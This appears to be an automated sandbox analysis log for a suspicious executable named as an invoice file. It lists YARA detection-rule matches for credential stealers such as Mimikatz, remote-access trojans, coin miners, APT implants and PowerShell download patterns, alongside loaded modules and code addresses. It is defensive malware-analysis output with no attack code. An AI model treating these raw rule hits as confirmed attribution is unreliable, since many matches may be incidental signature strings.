Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Detects OilRig malware Author: Eyal Sela (slightly modified by Florian Roth)
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: detect netwire in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR	Matched rule: CVE_2018_4878_0day_ITW Author: unknown

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\oobe\UserOOBEBroker.exe	Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	Section loaded: edgegdi.dll

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe

File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p

Jump to behavior

Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2627396659.0000000000417000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePYRAMIDLIKE.exe vs FAKTURA I PARAGONY.exe
Source: FAKTURA I PARAGONY.exe	Binary or memory string: OriginalFilenamePYRAMIDLIKE.exe vs FAKTURA I PARAGONY.exe

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62ff37e.139.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c32d4.170.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.76.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.172.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c283a.171.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd62c2d87.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_004016E3
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_004014F4
Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Code function: 0_2_00401730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_01044320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_01043A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0104BA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0104C7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_01043708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_010A6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_010A07E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0144A058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0144CBD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_0144760F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_01444EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_01441D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFCE4F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFC10A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFCBDE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFC118F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFC4209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFC5BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFCA5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFC6548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1CFC6648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1E005E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1E004ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 10_2_1E006AF1

Source: FAKTURA I PARAGONY.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 35.3.MpSigStub.exe.28bd63a2bca.206.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPE	Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 35.3.MpSigStub.exe.28bd75cd186.46.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 35.3.MpSigStub.exe.28bd69011fa.70.raw.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd78ce0e6.219.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 35.3.MpSigStub.exe.28bd7b2bc01.176.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718e899.156.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718e899.156.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd68763ba.143.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_wellmess_dotnet_unique_strings author = NCSC, description = Rule to detect WellMess .NET samples based on unique strings and function/variable names, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 2285a264ffab59ab5a1eb4e2b9bcab9baf26750b6c551ee3094af56a4442ac41
Source: 35.3.MpSigStub.exe.28bd6901bfe.72.raw.unpack, type: UNPACKEDPE	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd63a15c6.205.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718d495.114.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd718d495.114.raw.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 35.3.MpSigStub.exe.28bd80b0d72.120.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 35.3.MpSigStub.exe.28bd7b2bc01.58.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd703f03e.63.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.28bd7b2bc01.215.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd703fc42.61.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 35.3.MpSigStub.exe.28bd772c1c6.109.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 35.3.MpSigStub.exe.28bd780418a.59.raw.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd780418a.59.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd72c6dd5.218.raw.unpack, type: UNPACKEDPE	Matched rule: CredTheft_MSIL_TitoSpecial_1 author = FireEye, description = This rule looks for .NET PE files that have the strings of various method names in the TitoSpecial code., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 4bf96a7040a683bd34c618431e571e26
Source: 35.3.MpSigStub.exe.28bd736083d.96.raw.unpack, type: UNPACKEDPE	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.28bd7b65929.38.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.28bd703e43a.62.raw.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 35.3.MpSigStub.exe.28bd77beebe.15.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XMRIG_String date = 2018-12-28, hash1 = eb18ae69f1511eeb4ed9d4d7bcdf3391a06768f384e94427f4fc3bd21b383127, author = Florian Roth, description = Detects a suspicious XMRIG crypto miner executable string in filr, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd7098dc6.98.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPE	Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPE	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd80e54d2.88.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.28bd67c4b16.150.unpack, type: UNPACKEDPE	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 35.3.MpSigStub.exe.28bd63ac0ae.183.raw.unpack, type: UNPACKEDPE	Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd66af16e.159.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd78ce0e6.54.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack, type: UNPACKEDPE	Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.28bd63a2bca.206.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd780418a.26.raw.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd780418a.26.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.28bd7ec89ca.90.raw.unpack, type: UNPACKEDPE	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.28bd6408d22.17.raw.unpack, type: UNPACKEDPE	Matched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.28bd6408d22.17.raw.unpack, type: UNPACKEDPE	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack, type: UNPACKEDPE	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack, type: UNPACKEDPE	Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 35.3.MpSigStub.exe.28bd80ae56a.119.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
